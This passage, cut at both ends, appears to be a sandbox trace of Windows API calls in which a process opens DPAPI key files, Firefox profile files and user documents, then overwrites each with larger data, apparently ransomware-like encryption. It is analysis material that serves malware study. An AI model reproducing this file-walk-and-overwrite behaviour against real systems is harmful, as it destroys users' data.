halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0180.177] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0180.177] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x1d4 [0180.177] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0180.177] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.177] ReleaseMutex (hMutex=0x168) returned 1 [0180.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="102a7bc8-3f85-4bb4-840a-38257d2965d2", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0180.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="102a7bc8-3f85-4bb4-840a-38257d2965d2", cchWideChar=36, lpMultiByteStr=0x1fa53fc, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="102a7bc8-3f85-4bb4-840a-38257d2965d2", lpUsedDefaultChar=0x0) returned 36 [0180.177] ReadFile (in: hFile=0x1d8, lpBuffer=0x26dd2c8, nNumberOfBytesToRead=0x1d4, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x26dd2c8*, lpNumberOfBytesRead=0x2fdf2bc*=0x1d4, lpOverlapped=0x0) returned 1 [0180.179] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0180.179] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a56c8*, nNumberOfBytesToWrite=0x75c, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a56c8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x75c, lpOverlapped=0x0) returned 1 [0180.179] CloseHandle (hObject=0x1d8) returned 1 [0180.179] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\addons.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0180.180] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0180.180] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x18 [0180.181] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0180.181] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.181] ReleaseMutex (hMutex=0x168) returned 1 [0180.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="addons.json", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0180.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="addons.json", cchWideChar=11, lpMultiByteStr=0x1f7366c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="addons.json", lpUsedDefaultChar=0x0) returned 11 [0180.181] ReadFile (in: hFile=0x1d8, lpBuffer=0x1f88bc8, nNumberOfBytesToRead=0x18, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f88bc8*, lpNumberOfBytesRead=0x2fdf2bc*=0x18, lpOverlapped=0x0) returned 1 [0180.182] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0180.183] WriteFile (in: hFile=0x1d8, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5a0, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x5a0, lpOverlapped=0x0) returned 1 [0180.183] CloseHandle (hObject=0x1d8) returned 1 [0180.183] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\prefs.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0180.410] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0180.411] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xfde [0180.411] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0180.411] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.411] ReleaseMutex (hMutex=0x168) returned 1 [0180.411] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="prefs.js", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0180.411] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="prefs.js", cchWideChar=8, lpMultiByteStr=0x1f7356c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="prefs.js", lpUsedDefaultChar=0x0) returned 8 [0180.411] ReadFile (in: hFile=0x208, lpBuffer=0x26ae978, nNumberOfBytesToRead=0xfde, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x2fdf2bc*=0xfde, lpOverlapped=0x0) returned 1 [0180.413] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0180.413] WriteFile (in: hFile=0x208, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x1566, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x2fdf2d0*=0x1566, lpOverlapped=0x0) returned 1 [0180.413] CloseHandle (hObject=0x208) returned 1 [0180.414] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\sCBIpGeB_eekLpWuqpb.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\scbipgeb_eeklpwuqpb.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0180.415] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0180.415] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x1741 [0180.415] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0180.415] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.415] ReleaseMutex (hMutex=0x168) returned 1 [0180.415] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sCBIpGeB_eekLpWuqpb.wav", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0180.415] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sCBIpGeB_eekLpWuqpb.wav", cchWideChar=23, lpMultiByteStr=0x1f88b2c, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sCBIpGeB_eekLpWuqpb.wav", lpUsedDefaultChar=0x0) returned 23 [0180.415] ReadFile (in: hFile=0x208, lpBuffer=0x2663838, nNumberOfBytesToRead=0x1741, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x2fdf2bc*=0x1741, lpOverlapped=0x0) returned 1 [0180.416] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0180.416] WriteFile (in: hFile=0x208, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x1cc9, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x2fdf2d0*=0x1cc9, lpOverlapped=0x0) returned 1 [0180.417] CloseHandle (hObject=0x208) returned 1 [0180.417] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0180.418] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0180.418] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x10b1e [0180.418] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0180.418] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.418] ReleaseMutex (hMutex=0x168) returned 1 [0180.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Administrator.contact", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0180.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Administrator.contact", cchWideChar=21, lpMultiByteStr=0x1f88b2c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Administrator.contact", lpUsedDefaultChar=0x0) returned 21 [0180.418] ReadFile (in: hFile=0x208, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0180.476] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0xfb1e [0180.476] ReadFile (in: hFile=0x208, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0180.582] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0xfb1e [0180.582] WriteFile (in: hFile=0x208, lpBuffer=0x25ad738*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25ad738*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0180.583] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0180.583] WriteFile (in: hFile=0x208, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0180.584] CloseHandle (hObject=0x208) returned 1 [0180.584] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\AlkULkIhPUHHHdS-Vx.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\alkulkihpuhhhds-vx.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0180.585] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0180.585] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x1409b [0180.585] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0180.585] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.585] ReleaseMutex (hMutex=0x168) returned 1 [0180.585] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlkULkIhPUHHHdS-Vx.pptx", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0180.585] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlkULkIhPUHHHdS-Vx.pptx", cchWideChar=23, lpMultiByteStr=0x1f88b2c, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AlkULkIhPUHHHdS-Vx.pptx", lpUsedDefaultChar=0x0) returned 23 [0180.585] ReadFile (in: hFile=0x208, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0180.586] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x1309b [0180.587] ReadFile (in: hFile=0x208, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0180.587] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x1309b [0180.587] WriteFile (in: hFile=0x208, lpBuffer=0x25ad738*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25ad738*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0180.587] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0180.587] WriteFile (in: hFile=0x208, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0180.588] CloseHandle (hObject=0x208) returned 1 [0180.588] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lS gbMc\\w_cTPWrggY.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ls gbmc\\w_ctpwrggy.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0180.588] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0180.588] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x18821 [0180.589] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0180.589] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.589] ReleaseMutex (hMutex=0x168) returned 1 [0180.589] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="w_cTPWrggY.odp", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0180.589] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="w_cTPWrggY.odp", cchWideChar=14, lpMultiByteStr=0x1f7356c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="w_cTPWrggY.odp", lpUsedDefaultChar=0x0) returned 14 [0180.589] ReadFile (in: hFile=0x208, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0180.590] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x17821 [0180.590] ReadFile (in: hFile=0x208, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0180.590] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x17821 [0180.591] WriteFile (in: hFile=0x208, lpBuffer=0x25ad738*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25ad738*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0180.591] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0180.591] WriteFile (in: hFile=0x208, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0180.591] CloseHandle (hObject=0x208) returned 1 [0180.591] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vLykOV4Y_3l2VkIHp\\l9h2RZXXX5kbGC\\sqqa\\8fTjvVP.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vlykov4y_3l2vkihp\\l9h2rzxxx5kbgc\\sqqa\\8ftjvvp.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0180.592] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0180.592] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x12eda [0180.592] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0180.592] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.592] ReleaseMutex (hMutex=0x168) returned 1 [0180.592] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8fTjvVP.csv", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0180.592] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8fTjvVP.csv", cchWideChar=11, lpMultiByteStr=0x1f7362c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8fTjvVP.csv", lpUsedDefaultChar=0x0) returned 11 [0180.592] ReadFile (in: hFile=0x208, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0180.593] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x11eda [0180.593] ReadFile (in: hFile=0x208, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0180.593] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x11eda [0180.593] WriteFile (in: hFile=0x208, lpBuffer=0x25ad738*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25ad738*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0180.594] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0180.594] WriteFile (in: hFile=0x208, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0180.594] CloseHandle (hObject=0x208) returned 1 [0180.594] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0180.595] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0180.595] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xe2 [0180.595] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0180.595] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0180.595] ReleaseMutex (hMutex=0x168) returned 1 [0180.595] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Web Slice Gallery.url", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0180.595] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Web Slice Gallery.url", cchWideChar=21, lpMultiByteStr=0x1f88b2c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Web Slice Gallery.url", lpUsedDefaultChar=0x0) returned 21 [0180.595] ReadFile (in: hFile=0x208, lpBuffer=0x26c4b98, nNumberOfBytesToRead=0xe2, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c4b98*, lpNumberOfBytesRead=0x2fdf2bc*=0xe2, lpOverlapped=0x0) returned 1 [0180.596] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0180.596] WriteFile (in: hFile=0x208, lpBuffer=0x25a56c8*, nNumberOfBytesToWrite=0x66a, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a56c8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x66a, lpOverlapped=0x0) returned 1 